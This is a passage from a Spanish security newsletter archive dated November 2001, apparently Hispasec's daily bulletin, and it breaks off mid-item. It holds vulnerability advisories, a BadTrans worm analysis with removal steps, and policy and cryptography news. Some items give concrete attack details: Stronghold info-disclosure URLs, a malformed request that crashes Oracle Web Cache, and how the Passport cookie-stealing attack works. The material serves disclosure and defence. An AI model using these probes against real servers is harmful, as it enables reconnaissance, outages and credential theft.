viernes, 30 de noviembre de 2001

Divulgación de la configuración en servidores web Stronghold

Existe un problema de seguridad en Redhat Stronghold desde las versiones
2.3 hasta la 3.0 que permite a un atacante obtener información sensible
sobre los archivos del sistema y su configuración, incluido el archivo
httpd.conf
Stronghold es un servidor seguro de Web que cumple el protocolo SSL y
utiliza 128 bits de encriptación. Está basado en el famoso servidor de
web Apache y añade toda una amplia gama de beneficios que le convierte
en un servidor web bastante extendido en aplicaciones de comercio
electrónico.

Si no se ha activado el acceso restringido al estado del servidor será
posible para un atacante remoto obtener información que le podrá ser de
gran ayuda para la realización de un ataque más elaborado. Para evitar
el problema Redhat ha publicado Stronghold/3.0 build 3015 que resuelve
esta vulnerabilidad.

El problema se agrava una vez más por la sencillez con la que el
atacante podrá conseguir la información sensible, mediante dos simples
urls:
http://sistema_afectado/stronghold-info
se podrá obtener información sobre la configuración, versiones, y los
contenidos del archivo httpd.conf.
http://sistema_afectado/stronghold-status
devolverá información sobre el estado del servidor, peticiones, carga,
etc.



Antonio Ropero
antonior@hispasec.com


Más información:

Vigilante
http://securescannx.vigilante.com/tc/17227

Stronghold Secure Web Server
http://www.c2.net/

RedHat. Stronghold 3 launches updated security with build 3015
http://www.redhat.com/software/apache/stronghold/latest.html



jueves, 29 de noviembre de 2001

El parlamento europeo debate el uso de "cookies" y "spam"

Una vez más nos llegan noticias de la UE, sobre nuevos proyectos
dirigidos a proteger la privacidad de los usuarios de Internet. Aunque
nada nos asegura que se lleguen a aprobar estas nuevas medidas.
Antes de que estas medidas vean la luz deben de pasar por el refrendo
de la comisión y el consejo de la UE. Este último paso se vislumbra el
más difícil ya que se encontrará con las posturas particulares de los
países que conforman la Unión Europea. En principio ya ha encontrado
una postura totalmente contraria de la "IAB" (Interactive Advertising
Bureau), asociación que engloba a empresas publicistas, que estima que
tras la entrada en vigor de esta ley, el negocio podría acarrear unas
perdidas de más de 270 millones de dólares solamente en Gran Bretaña.

Las cookies son pequeños ficheros de texto mantenidos por el propio
navegador que almacenan información sobre la personalización del usuario
para cada sitio web. Se utilizan para "entrenar" a los servidores sobre
nuestros gustos, hábitos de navegación, o incluso para almacenar nombres
de usuarios y passwords. El principio de diseño siempre debería ser
utilizar las cookies sólo lo imprescindible y "siempre" informar al
navegante de para qué se van a utilizar.

Por otra parte, el termino "spam" se emplea para referirse al envío
masivo y no solicitado de correo e-mail, primcipalmente con motivos
publicitarios. Este problema se agrava por la dificultad, por no decir
imposibilidad, de dejar de recibir este tipo de mensajes.

Extracto de la información recopilada en la web de la oficina del
parlamento europeo en España.

"Las enmiendas del Parlamento prohíben, en todo caso, los mensajes
electrónicos comerciales que no dejen clara la identidad del
remitente, así como las 'cookies', y matizan las excepciones a la
directiva por motivos de seguridad nacional o defensa."

Otra enmienda presentada por el grupo Socialista y grupo de los
Verdes permite que las empresas usen la dirección e-mail obtenida de
sus clientes para fines de comercialización directa, a condición de
que los clientes puedan poner fin en cada mensaje, de manera gratuita
y con facilidad, a ese uso.

"Prohibición de las cookies
Por su parte, la Cámara propone la prohibición explícita de las
'cookies', identificadores escondidos que entran en el equipo terminal
del usuario sin su conocimiento o consentimiento explícito, salvo
autorización previa del usuario."

"Excepciones
El texto de la comisión se basa en general en el principio de
consentimiento previo. No obstante, permite como excepción al
principio de consentimiento previo el uso de datos para localización
de los servicios de emergencia. También recoge las excepciones
concedidas a los Estados miembros con fines de seguridad nacional o
pública, defensa o investigación de delitos. Las enmiendas del
Parlamento matizan esta excepción señalando que las medidas que
atenten contra la intimidad de datos deben ser apropiadas,
proporcionadas y limitadas en el tiempo, totalmente excepcionales y
permitidas por las autoridades judiciales u otras autoridades
competentes."

"Opt in y opt out para el correo
Por lo que respecta al correo electrónico no solicitado con fines de
venta directa el llamando spam, la propuesta de la Comisión propone
la harmonización con listas de inclusión, es decir, que los abonados
deben dar el consentimiento previo. Por su parte, el Parlamento es
partidario de que se permita a los Estados miembros elegir entre
prohibir esas comunicaciones cuando no cuenten con el consentimiento
de los abonados o bien prohibirlas para aquellos abonados que hayan
indicado que no quieren recibir esas llamadas. Es decir, que se pueda
escoger entre un sistema de opt in listas de inclusión o de opt out.
No obstante, el Parlamento prohíbe el envío de mensajes electrónicos
comerciales cuando no esté clara la identidad del remitente o cuando
no figure una dirección válida para solicitar el cese de la
comunicación."

"Fax y llamadas automáticas
Por lo que respecta a las llamadas automáticas y envíos por fax, la
Cámara está de acuerdo con la propuesta de la Comisión de que se
autoricen los mensajes con fines de venta directa sólo para aquellos
abonados que hayan dado su consentimiento previo. Y añade en este
contexto a los servicios de mensajes cortos SMS por teléfonos
móviles."

"Guías de abonados
La directiva se refiere también a las guías de abonados. Quienes
figuren en la guía deben estar informados sobre los fines de la misma
y deben tener la posibilidad de determinar si los datos que figuran
son pertinentes. El Parlamento Europeo añade que debe informarse al
abonado antes de incluirlo en la guía y no una vez que ésta haya sido
publicada. También se exige que la exclusión de algunos datos pueda
solicitarse de forma gratuita."



Antonio J. Román Arrebola
roman@hispasec.com


Más información:

El Parlamento deja en manos de los Estados la elección del sistema
aplicable a las comunicaciones electrónicas comerciales
http://www.europarl.es/actualidad/ficha.phtm?p=2&id=791

El Parlamento se pronunciará de nuevo sobre la protección de la
intimidad en las comunicaciones electrónicas
http://www.europarl.es/actualidad/ficha.phtm?p=2&id=759

Interactive Advertising Bureau
http://www.iab.net



miércoles, 28 de noviembre de 2001

Actualización para problema con las sesiones de JRun

La administración de sesiones de JRun tiene un defecto que permite que
los usuarios puedan tener sesiones duplicadas en determinadas
circunstancias, esto puede llegar a comprometer la seguridad de las
sesiones.
Allaire JRun es una suite de desarrollo de aplicaciones basadas en
páginas JSP y Servlets en Java. Se ha descubierto un problema por el
cual diversos usuarios pueden tener el mismo identificador de sesión con
los consiguientes problemas de seguridad que ello puede provocar.

Este problema se reproduce en JRun 3.0 y JRun 3.1 bajo todas las
plataformas en cualquier servidor web. Si una aplicación se llama
"noticias", entonces el acceso al documento por defecto con una llamada
de la siguiente forma: http://nombre_maquina/noticias
(sin la barra /) podrá provocar que el usuario obtenga un id de sesión
que ya se encuentre activo, en vez de una nueva sesión.

Macromedia recomienda a los usuarios que descarguen el parche
correspondiente a la versión que ejecuten.

Para JRun 3.1
http://download1.allaire.com/publicdl/en/jrun/30/JRun30_HF_24049.jar
Para JRun 3.0
http://download.allaire.com/publicdl/en/jrun/31/JRun31_HF_24049.jar



Antonio Ropero
antonior@hispasec.com


Más información:

Macromedia Product Security Bulletin (MPSB01-10)
JRun 3.1, JRun 3.0: Hotfix Available for JRun Server Duplicate Session
ID Security Issue
http://www.allaire.com/handlers/index.cfm?ID=22234&Method=Full



martes, 27 de noviembre de 2001

"BadTrans.B": preguntas y respuestas

"BadTrans.B" sigue propagándose por todo el mundo, con especial
virulencia en Europa en comparación con Estados Unidos. En la entrega
de hoy vamos a dar respuesta a las consultas más usuales que los
lectores nos han hecho llegar con respecto a las recomendaciones que
proponíamos para prevenir y eliminar a este gusano.
La noticia original sobre la descripción, prevención y eliminación de
"BadTrans.B" puede encontrarse en la dirección:

http://www.hispasec.com/unaaldia.asp?id=1127

>Soy usuario de Mac, pero me pregunta mi hermano cómo puede
>desembarazarse del BadTrans. Le he indicado que borre manualmente
>los archivos que mencionáis en vuestra última noticia, pero el
>kdll.dll y el KERNEL32.EXE no se lo permite "por estar en uso"

Dile que pulse: Inicio -> Apagar el sistema -> Reiniciar en modo
MS-DOS

A continuación: cd system (pulsar intro) -> del kernel32.exe (pulsar
intro) -> del kdll.dll (pulsar intro)

>He logrado borrar los archivos que comentáis en vuestra noticia,
>¿pero como se quita lo del registro de Windows?

Pulsa: Inicio -> Ejecutar -> escribe "regedit" -> botón Aceptar

En la ventana que aparece, pulsar en el menú Edición -> Buscar ->
escribe "kernel32.exe" -> botón Aceptar

Comenzará la búsqueda, si encuentra una entrada (aparecerá señalada
la palabra "Kernel32" en la columna Nombre y "kernel32.exe" en
Datos) pulsa la tecla "Supr", a la pregunta "¿Confirma que desea
eliminar est valor?" pulsa el botón "Sí".

>A la hora de actualizar el Internet Explorer, en Hispasec dais unos
>enlaces diferentes a los que recomiendan los antivirus, ¿por qué?
>¿cual debo instalar?

Ambos son correctos, si bien el que proponemos nosotros es más
recomendable. La mayoría de los antivirus han recurrido al parche
que Microsoft distribuyó cuando se conoció la vulnerabilidad (29
marzo 2001), mientras que nosotros recomendamos la instalación
del Service Pack 2 para Internet Explorer (19 junio 2001 en el
caso de IE5.01, y 2 agosto 2001 para IE5.5).

La diferencia está en que el parche concreto solo corrige esta
vulnerabilidad, mientras que el Service Pack 2 es acumulativo,
corrige la misma vulnerabilidad y además recoge todas las demás
conocidas hasta la fecha de su publicación.

Otro problema al instalar parches concretos de hace meses es que
pueden provocar problemas de regresión de vulnerabilidades
posteriores. Por ejemplo, en el caso de alguien que ya tuviera
instalado el Service Pack 2 y que a posteriori instalara un
parche concreto anterior (por ejemplo el del 29 de marzo).



Bernardo Quintero
bernardo@hispasec.com


Más información:

25/11/2001 - Nueva variante del gusano BadTrans
http://www.hispasec.com/unaaldia.asp?id=1127



lunes, 26 de noviembre de 2001

Denegación de servicios en Oracle 9iAS Web Cache

Existe una vulnerabilidad de denegación de servicio en Oracle 9iAS Web
Cache por la cual un usuario remoto puede llegar a causar una denegación
de servicio en Oracle 9i Application Server.
Oracle9iAS Web Cache es una solución de cache web para Oracle 9iAS
Application Server permitiendo la recuperación rápida de contenido web
dinámico. Existe un problema en el software de cache web en el
tratamiento de peticiones maliciosamente creadas.

Un atacante remoto podrá provocar un ataque de denegación de servicios
sobre Oracle 9i Application Server mediante el envío de una petición con
el campo Content-Length de contenido 0, seguido de tres "0a"'s. Con esto
el atacante impedirá el acceso a la base de datos a los usuarios
legítimos.

Será necesario reiniciar el servicio para recuperar la funcionalidad
habitual.



Antonio Ropero
antonior@hispasec.com


Más información:

Oracle:
http://www.oracle.com

Securityfocus:
http://www.securityfocus.com/bid/3568

Securitytracker
http://securitytracker.com/alerts/2001/Nov/1002818.html



domingo, 25 de noviembre de 2001

Nueva variante del gusano BadTrans

En las últimas horas se ha detectado una creciente actividad de
"BadTrans.B", un gusano/troyano que se ditribuye por correo
electrónico y que es capaz de ejecutarse de forma automática en
Outlook y Outlook Express con tan sólo visualizar un mensaje
infectado.
Más vale prevenir...

"BadTrans.B" explota una vulnerabilidad conocida de Internet Explorer
a través de la cual es posible forzar la ejecución automática de un
binario adjunto en un mensaje de correo (.EML). Para lograrlo modifica
la cabecera MIME que hace referencia al archivo de forma que simula
ser un formato confiable. Esto provoca que Internet Explorer lo abra
sin preguntar al usuario. Esta vulnerabilidad es heredada por los
clientes de correo Outlook y Oulook Express, ya que utilizan el
componente de Internet Explorer para visualizar los mensajes HTML.

El problema de la ejecución automática afecta a los usuarios de
Internet Explorer, versiones 5.01 y 5.5, que no tengan actualizado su
navegador. La solución pasa por migrar a Internet Explorer 6 o
actualizar sus versiones con los últimos parches acumulativos, como
mínimo el Service Pack 2 o actualizaciones posteriores.

Descarga Internet Explorer 6
http://www.microsoft.com/windows/ie/default.asp

Internet Explorer 5.01 - Service Pack (19 junio, 2001)
http://www.microsoft.com/windows/ie/downloads/recommended/ie501sp2/default.asp

Internet Explorer 5.5 - Service Pack 2 (2 agosto, 2001)
http://www.microsoft.com/windows/ie/downloads/recommended/ie55sp2/default.asp

Con estas actualizaciones evitaremos que "BadTrans.B" se pueda
ejecutar de forma automática, pero aun podremos ser infectados si
recibimos un mensaje infectado y abrimos el archivo adjunto de forma
manual. Una vez más recordamos la regla de oro: "No abrir archivos
adjuntos que no hayamos solicitado".

Así nos llega...

"BadTrans.B" suele llegar en un correo electrónico sin texto en el cuerpo
del mensaje y adjunto en un archivo con las siguientes características:

El nombre del archivo puede ser (incluida variantes mayúsculas/minúsculas):

Pics
Card
images
Me_nude
README
Sorry_about_yesterday
New_Napster_Site
info
news_doc
docs
HAMSTER
Humor
YOU_are_FAT!
fun
stuff
SEARCHURL
SETUP
S3MSONG

Primera extensión:

.DOC
.ZIP
.MP3

Segunda extensión (real):

.scr
.pif

Por ejemplo: "Pics.DOC.scr" o "Card.MP3.pif"

Infectando...

Cuando logra ejecutarse en un sistema, "BadTrans.B" copia tres
archivos en el directorio sistema de Windows, por defecto como:

c:\windows\system\KERNEL32.EXE (el gusano)
c:\windows\system\kdll.dll (troyano que captura el teclado)v
c:\windows\system\cp_25389.nls (registro de captura del troyano)

También añade una entrada en el registro de Windows para asegurarse
que se ejecuta con cada inicio de sesión:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
Kernel32 = kernel32.exe

Para evitar enviarse dos veces a un mismo destinatario, "BadTrans"
lleva un registro con todas las direcciones a las que se envía, en el
archivo PROTOCOL.DLL, que también sitúa en el directorio de sistema
de Windows.

Tal y como hemos visto, el gusano también posee un módulo que actúa
de troyano (kdll.dll) interceptando y almacenando todas las
pulsaciones de teclado que haga la víctima. Las capturas se guardan
en un archivo (cp_25389.nls) y son enviadas a la dirección de correo
"uckyjw@hotmail.com". Allí el creador del gusano podrá recoger
información sensible, tales como contraseñas, tarjetas de crédito,
etc, que el troyano haya capturado de los sistemas infectados.

Para desinfectarlo de forma manual basta con eliminar los tres archivos
mencionados junto con la clave del registro.



Bernardo Quintero
bernardo@hispasec.com


Más información:

I-Worm.BadtransII
http://www.avp.ch/avpve/worms/email/badtrans2.stm

W32/Badtrans@MM
http://vil.nai.com/vil/virusSummary.asp?virus_k=99069

W32/Badtrans-B
http://www.sophos.com/virusinfo/analyses/w32badtransb.html

WORM_BADTRANS.B
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=WORM_BADTRANS.B



sábado, 24 de noviembre de 2001

Vulnerabilidad en el procesador de archivos asf de Windows Media Player

Existe una vulnerabilidad de seguridad en Windows Media Player
debido a que el código encargado de procesar los archivos ASF
(Advanced Streaming Format) contiene un búfer sobre el que no se
realizan las adecuadas comprobaciones.
Un atacante podrá crear un archivo ASF malicioso e inducir al
usuario para su ejecución y provocar de esta forma el desbordamiento
de búfer. Como en la mayoría de casos de desbordamiento de búfer el
problema podrá tener dos resultados, el simple fallo de Windows Media
Player 6.4 o en el peor de los casos la ejecución de código en la
máquina del usuario con los permisos de este.

El parche, sin embargo, elimina otras vulnerabilidades, ya que
soluciona todas las vulnerabilidades conocidas que afectan a Windows
Media Player 6.4. Aunque el problema original afecta a la versión 6.4
del reproductor, por motivos de compatibilidad hacia versiones
anteriores Windows Media Player 7, 7.1 y XP también incluyen
componentes de la versión 6.4 con lo que se recomienda la instalación
del parche en todos los sistemas para evitar cualquier problema.

Hasta el momento el parche sólo se encuentra disponible para las versiones
inglés-USA de Windows Media Player 6.4, 7, o 7.1 que puede descargarse de:

http://download.microsoft.com/download/winmediaplayer/Update/308567/WIN98MeXP/EN-US/wm308567.exe



Antonio Ropero
antonior@hispasec.com


Más información:

Boletín de seguridad Microsoft (MS01-056)
Windows Media Player .ASF Processor Contains Unchecked Buffer
http://www.microsoft.com/technet/security/bulletin/ms01-056.asp



viernes, 23 de noviembre de 2001

Criptoanálisis de "Dual Counter Mode"

A los pocos días de publicarse, varios investigadores anuncian un
criptoanálisis a la propuesta de estándar criptográfico "Dual Counter
Mode".
La NSA (la agencia de seguridad nacional norteamericana) presentó el
modo de operación "Dual Counter" a principios de Agosto de 2001. Sus
objetivos eran proteger tanto el contenido como la integridad de los
datagramas IP, así como permitir el descifrado de los datagramas a
medida que estos llegan, aunque lo hagan de forma desordenada.

En Septiembre de 2001, tres investigadores norteamericanos (Pompiliu
Donescu, Virgil D. Gligor y David Wagner) publicaron un artículo en el
que muestran que el modo de operación propuesto es inseguro tanto en la
privacidad de los datos como en su integridad. Además, el DCM no puede
modificarse de forma simple para fortalecerlo.

Existe un segundo criptoanálisis, desarrollado por Phillip Rogaway,
cuyos detalles se hicieron públicos tras apenas una semana de evaluación
abierta del DCM.

Aunque los ataques son teóricos y los recursos necesarios para
explotarlos son muy elevados, ataques exitosos en un plazo de tiempo tan
corto constituyen una muy mala señal, y la NSA ha retirado esta
propuesta de estándar.

Según la documentación publicada, la NSA invirtió 18 meses en el
desarrollo de este nuevo modo de operación.

Una vez más se comprueba la -más que conveniencia- necesidad de la
publicación de forma abierta de estándares antes de que se displieguen
en el mercado, para poder estudiar sus fortalezas y vulnerabilidades
antes de que exista una base de usuarios que pueda salir perjudicada.



Jesús Cea Avión
jcea@hispasec.com


Más información:

Proposed Modes of Operation
http://csrc.nist.gov/encryption/modes/proposedmodes/

Dual Counter Mode
http://csrc.nist.gov/encryption/modes/proposedmodes/dctr/dctr-spec.pdf

http://www.cs.berkeley.edu/~daw/papers/dcm-prelim.ps

NSA's Dual Counter Mode Broken and Withdrawn
http://cryptome.org/nsa-dcm.htm

NSA's Dual Counter Mode
http://www.counterpane.com/crypto-gram-0109.html#2



jueves, 22 de noviembre de 2001

Pasaporte .NET al infierno

¿Se imagina disponer de un solo nombre de usuario y contraseña que
sirviera para entrar en todas partes? En el ordenador personal, en el
teléfono móvil, en el PDA, en las cuentas de correo de Internet, en
los sitios web de pago, en definitiva, en todas las máquinas y
servicios. Pues Microsoft ya lo ha imaginado y hasta ha bautizado a
la tecnología: Passport .NET.
En palabras de Microsoft, "Passport es un servicio en línea que hace
posible que pueda utilizar su dirección de correo electrónico y una
única contraseña para iniciar una sesión de forma segura en cualquier
servicio o sitio Web participante de Passport."

Según Microsoft, gracias a Passport se implantará en Internet el
inicio de sesión único. Es decir, el usuario con una cuenta de
Passport entrega sus credenciales una sola vez en un solo sitio y a
partir de ese momento puede autenticarse de forma transparente en
todos los demás sitios que participen en la iniciativa. La gran
ventaja de este enfoque es que los usuarios solamente se ven
obligados a recordar una única contraseña, que les permitirá
autenticarse en múltiples sitios.

Passport fue diseñado para utilizar las tecnologías web existentes en
el momento actual con el fin de no reinventar la rueda ni imponer
tecnología propietaria. En concreto, la redirección automática con
HTTP, JavaScript, cookies y SSL. No obstante, se indica que
JavaScript no resulta estrictamente necesario, aunque sí muy
recomendable.

Cuando un usuario visita un sitio web participante de Passport y
necesita autenticarse para, por ejemplo, realizar una compra o leer
su correo, el sitio web del comerciante redirige el navegador del
cliente a un servidor de autenticación de Passport. Este servidor le
presenta al usuario una página de inicio de sesión, cuyas
credenciales serán protegidas a través de un canal cifrado con SSL.
Si las credenciales suministradas por el usuario son válidas, el
servidor de Passport redirige al usuario nuevamente al sitio del
comerciante, incluyendo la información de autenticación en la cadena
de redirección. Para evitar que sea interceptada, esta información se
cifra utilizando triple DES con una clave sólo conocida por el
servidor de Passport y del comerciante. Una vez de vuelta en el
servidor del comerciante, éste le envía al navegador del usuario una
cookie cifrada con la información de autenticación.

De esta manera, en sucesivas visitas al sitio del comerciante ya no
es necesario autenticarse de nuevo, puesto que las credenciales se
leen de la cookie cifrada que el navegador envía al sitio en cada
petición.

Por otro lado, el servidor de Passport también le envía una cookie
cifrada con una misma clave maestra al navegador. Si el cliente
visita un nuevo sitio afiliado a Passport, no tiene que volver a
introducir su nombre de usuario y contraseña, ya que se leen de la
cookie cifrada que Passport le envió la primera vez. En esta segunda
ocasión y en las sucesivas, el servidor de Passport verifica las
credenciales de la cookie y si son correctas redirige de nuevo al
usuario al servidor del comerciante sin pedirle nuevamente que se
identifique.

Además de la autenticación única, Passport ofrece el servicio de
cartera en línea. La cartera de Passport permite almacenar
información sobre tarjetas de crédito y direcciones de envío y
facturación en una ubicación en línea supuestamente segura, junto con
el resto de la información del perfil. En teoría, sólo cada usuario
particular (y Microsoft) tiene acceso a la información de su cartera
de Passport. Cuando el cliente desea realizar una compra en un sitio
participante, puede tener acceso a esta información y enviarla al
vendedor instantáneamente y supuestamente con total seguridad, sin
tener que escribir de nuevo la información de pago, sin más que
pulsar un botón.

Pero no es oro todo lo que reluce. El 5 de noviembre de 2001, Marc
Slemko (http://alive.znep.com/~marcs/passport/) publicó un ataque
sobre Passport que obligó a Microsoft a cerrarlo durante horas para
mitigar (aunque no solucionar) el problema descubierto y explotado
por Slemko. El ataque constaba de cuatro pasos.

Primero, la víctima inicia una sesión con Passport para entrar en su
cuenta de Hotmail, la aplicación insignia de Microsoft para ilustrar
las bondades de su tecnología de inicio de sesión único (Single
Sign-In). La víctima además ha introducido sus datos confidenciales
en su monedero de Passport. Antes de que transcurran 15 minutos desde
que inició su sesión en Hotmail, lee un mensaje de correo electrónico
que le ha sido enviado por el atacante y que esconde un IFRAME
oculto, aprovechando un fallo en la validación de entrada de Hotmail.

Como consecuencia de la lectura de este mensaje, el usuario cargará
en su navegador sin saberlo una página procedente del web del
atacante. Esta página contiene dos frames. El primero permite robar
la cookie de Passport con la contraseña cifrada del usuario. El
segundo frame explota un agujero de Cross-Site Scripting
(http://www.cert.org/advisories/CA-2000-02.html) que permite ejecutar
un script creado por el atacante para robar las cookies.

Este script se ejecuta en el contexto de seguridad de la página de
Passport y como consecuencia se envían las cookies desde el frame
superior a un script en cgi en el servidor del atacante que las
almacena en un archivo.

Una vez en su poder con las cookies que identifican a la víctima ante
Passport, el atacante puede utilizarlas con un navegador para acudir
a un sitio participante de Passport y navegar hasta la página de pago
de una compra para que aparezca la información confidencial de la
víctima. La pobre víctima no se ha enterado de nada. Simplemente leyó
(sin hacer clic en ningún enlace) un correo que le fue enviado.

Si este ataque parece demasiado complicado, existen otros, publicados
por Jouko Pynnonen el 8 de noviembre de 2001
(http://www.solutions.fi/iebug/) y por Slemko
(http://alive.znep.com/~marcs/security/iecookie2/), el 15 de
noviembre de 2001, que permiten robar las cookies de otras maneras
igualmente imaginativas desde un dominio distinto de aquel para el
que han sido emitidas. Estos ataques parecen haber hecho temblar a
Microsoft, hasta el punto de que ya Passport ha dejado de funcionar.
Ahora ya no recuerda la contraseña de los usuarios y cada vez que se
salta de un sitio participante de Passport a otro, se le pide al
usuario nuevamente la contraseña.

El sueño de Microsoft se ha hecho añicos. Adiós a Passport .NET. Una
vez más, se demuestra que vender la piel del oso antes de cazarlo es,
como mínimo, una mala manera de hacer marketing. La Web es demasiado
compleja y se presentan demasiados problemas como para solucionarlos
con dos cookies y un par de líneas en JavaScript. El inicio de sesión
único, esto es, un solo nombre de usuario y una sola contraseña para
un acceso universal a máquinas y servicios, tendrá que esperar aún
más.



Gonzalo Álvarez Marañón
criptonomicon@iec.csic.es


Más información:

Microsoft Passport to Trouble
http://alive.znep.com/~marcs/passport

Criptonomicón
http://www.iec.csic.es/criptonomicon



miércoles, 21 de noviembre de 2001

SANA, nuevo servicio de Hispasec

El Servicio de Análisis, Notificación y Alertas (SANA) es un completo
sistema de información en tiempo real destinado a cubrir las
necesidades de empresas y profesionales en materia de seguridad informática.
Como podrán comprobar los lectores de "una-al-día" la aparición de nuevos
agujeros de seguridad es constante, así como su explotación en forma de
ataques. La información precisa, en tiempo y contenido, es sin duda la mejor
herramienta de seguridad contra las vulnerabilidades y nuevas amenazas que
pueden afectar a su sistema.

Hispasec Sistemas, gracias a su experiencia en el campo de la seguridad
informática y consciente de la importancia de un sistema de alertas en
tiempo real, ha diseñado un servicio de información que se adapta a las
necesidades de cada cliente y sus sistemas. En cualquier sitio y en
cualquier momento, SANA hace llegar la información más reciente que pueda
afectar o ser de interés para el usuario, según el perfil que haya
configurado. Para lograrlo, SANA utiliza distintos formatos de notificación,
a través del correo electrónico y mediante mensajes SMS a teléfonos móviles,
un servicio de alertas que trabaja 24 horas al día, 365 días al año.

SANA se divide en 3 sectores. Las alertas, información puntual sobre nuevas
vulnerabilidades que realmente puedan afectar a los sistemas del cliente,
junto con las medidas preventivas y/o parches para subsanarlas. Los
análisis, documentos técnicos elaborados por Hispasec que ayudan a instalar,
configurar, establecer políticas y mantener seguros sus sistemas. Por último
el diario, una recopilación de noticias del sector y demás publicaciones
relacionadas con la seguridad informática.

Más información sobre este servicio en http://www.hispasec.com/sana/




Hispasec Sistemas
hispasec@hispasec.com



martes, 20 de noviembre de 2001

Parche experimental para servidores virtuales Linux

Se publica un parche experimental para Linux que permite el particionado
del sistema operativo en entidades separadas e independientes,
posibilitando la creación de un número ilimitado de "servidores
virtuales" dentro de la misma máquina.
Cada servidor virtual puede tener una visión propia del sistema de
ficheros (vía "chroot" y "mount"), una IP separada (vía la nueva llamada
al sistema "set_ipv4root") y una lista de procesos independiente (vía la
nueva llamada al sistema "new_s_context"), para que los diferentes
servidores virtuales no puedan listar o acceder a procesos externos.

Con estas nuevas funcionalidades es posible crear servidores virtuales
arbitrarios, cada uno de ellos independiente de los demás y sin que se
produzcan interferencias entre ellos, incluso para los "superusuarios" o
"root", o ejecutables SETUID.

Todas las máquinas virtuales se ejecutan bajo la misma imagen de sistema
operativo, por lo que su rendimiento es óptimo, y no se requiere ningún
cambio en las herramientas para hacer uso de esta nueva funcionalidad.

Otros Unix disponen de funcionalidades similares, como la función "jail"
de *BSD, pero el parche propuesto para Linux es más flexible y permite
posibilidades extra, como que el "super super usuario" (el usuario
"root" del dominio de seguridad "root") pueda añadir nuevos procesos a
un servidor virtual ya creado y en funcionamiento.

Además "new_s_context" es una llamada a sistema no privilegiada,
pudiendo ser utilizada por cualquier usuario. Por ejemplo, para
"encerrar" un proceso no fiable y que éste no pueda interactuar con
otros procesos del sistema, incluso del mismo usuario. "set_ipv4root"
tampoco es una llamada privilegiada.

Se trata de un parche experimental pero bastante robusto. Cualquier
administrador de sistemas Linux debería echarle un vistazo, sobre
todo si su trabajo está relacionado con el hospedaje de máquinas
y/o servicios. Personalmente vería muy interesante que este parche
se acabase integrando con el kernel Linux estándar.



Jesús Cea Avión
jcea@hispasec.com


Más información:

Announce: many virtual servers on a single box
http://lwn.net/2001/1018/a/virtual-servers.php3

Virtual private servers and security contexts
http://www.solucorp.qc.ca/miscprj/s_context.hc

One-Machine Linux Cluster
http://slashdot.org/article.pl?sid=01/11/06/2034233&mode=thread



lunes, 19 de noviembre de 2001

Vulnerabilidad de cross-site scripting en navegadores Opera

Una vez más el popular Georgi Guninski alerta de una nueva
vulnerabilidad, en este caso se trata de una problema de cross-site
scriptong que afecta al popular navegador Opera.
Según informa Guninski en su último aviso de seguridad ha descubierto
una vulnerabilidad de cross-site scripting en el popular navegador
Opera, que permite que usuarios remotos creen URLs especialmente
modificadas que provoquen que código JavaScript sea ejecutado por
otros usuarios.

Las vulnerabilidades podrán permitir que un script en una página acceda
a una página y sus propiedades en otro dominio. De esta forma un script
en una página web podrá acceder como mínimo a las cookies y enlaces en
dominios arbitrarios para los que el usuario tenga acceso.

También será posible para un script acceder a leer los enlaces
existentes en la cache del usuario y al historial. Según comenta el
propio Guninski esto puede tener graves implicaciones de privacidad, ya
que como bien se sabe en muchos casos las cookies y los enlaces del
historial o de la cache pueden almacenar información sensible como
nombres de usuario y passwords.

Como contramedida se recomienda inhabilitar javascript, si bien Opera
sugiere activar la opción "Use cookies to trace password protected
documents". Esta ultima opción recomendada por Opera es considerada por
Guninski como una medida paranoica y que provocará que algunas páginas
no sean operativas.



Antonio Ropero
antonior@hispasec.com


Más información:

Aviso de seguridad de Guninski:
http://www.guninski.com/opera1-desc.html

Securityfocus:
http://www.securityfocus.com/bid/3553



domingo, 18 de noviembre de 2001

¿Seguridad con Microsoft? (II)

Hace unos días contábamos como Microsoft tuvo que retirar el parche
para Windows ME destinado a corregir una vulnerabilidad en el servicio
UPnP (Universal Plug and Play). La buena noticia es que ya está
disponible la actualización libre de errores, la mala es que, como
de costumbre, el mundo hispano tendrá que esperar.
Como decíamos, el 1 de noviembre Microsoft publicaba un boletín donde
se describía y facilitaba un parche destinado a corregir una
vulnerabilidad en el servicio UPnP (Universal Plug and Play) que
afecta a Windows 98, ME y XP. Los usuarios de Windows ME que
instalaron el parche pasaron de la remota posibilidad de sufrir un
ataque DoS a poder tener continuos problemas a nivel de sistema.
Tras las primeras quejas Microsoft retiró el parche para Windows ME,
actualización que ha corregido y publicado el 13 de noviembre tal y
como queda reflejado en el mismo boletín.

Si bien, en dicho boletín, se ofrece como único enlace la dirección
del nuevo parche en su versión inglés-USA, y señala que están
disponibles las versiones en alemán y japonés que se pueden encontrar
en un segundo artículo que trata la vulnerabilidad. El mundo hispano
deberá esperar, Microsoft anuncia que el soporte al resto de idiomas
está en desarrollo y se podrá descargar próximamente en
WindowsUpdate.

No se trata de un hecho aislado. Los administradores de servidores
Windows NT/2000 en su versión española han sufrido en muchas
ocasiones el retraso en la publicación de actualizaciones críticas
respecto al resto de versiones. Los programadores que instalaran
Visual Studio en Windows versión española se habrán visto obligados
a migrar el sistema operativo a la versión en inglés si quieren
instalar algún Service Pack para sus herramientas de desarrollo.
Los usuarios domésticos no son ninguna excepción, a diario recibimos
consultas tipo "¿y el parche para la versión en español de Internet
Explorer?".

A juzgar por las últimas actualizaciones globales y específicas no
debemos esperar mucho, en realidad parece que Microsoft presenta en
los últimos tiempos mejoría en este aspecto. El Service Pack 2 para
Internet Explorer 5.5 versión en español tuvo un retraso de sólo 10
días respecto a la versión USA, mientras que el Service Pack 1 para
SQL Server 2000 apenas los separó 3 días, todo un récord en
comparación con las semanas, incluso meses, de tiempos atrás.

De todas formas preferimos que algún día Microsoft tome medidas para
garantizar la igualdad de condiciones y terminar de una vez por
todas con esta discriminación, sobre todo cuando de ello depende la
seguridad de nuestros sistemas.



Bernardo Quintero
bernardo@hispasec.com


Más información:

¿Seguridad con Microsoft?
http://www.hispasec.com/unaaldia.asp?id=1115

Microsoft Security Bulletin MS01-054
Invalid Universal Plug and Play Request can Disrupt System Operation
http://www.microsoft.com/technet/security/bulletin/MS01-054.asp



sábado, 17 de noviembre de 2001

Vulnerabilidad en CDE de diversos Unix

Se ha descubierto una vulnerabilidad de desbordamiento de búfer en el
demonio de red Subprocess Control Server (dtspcd) en todas las variantes
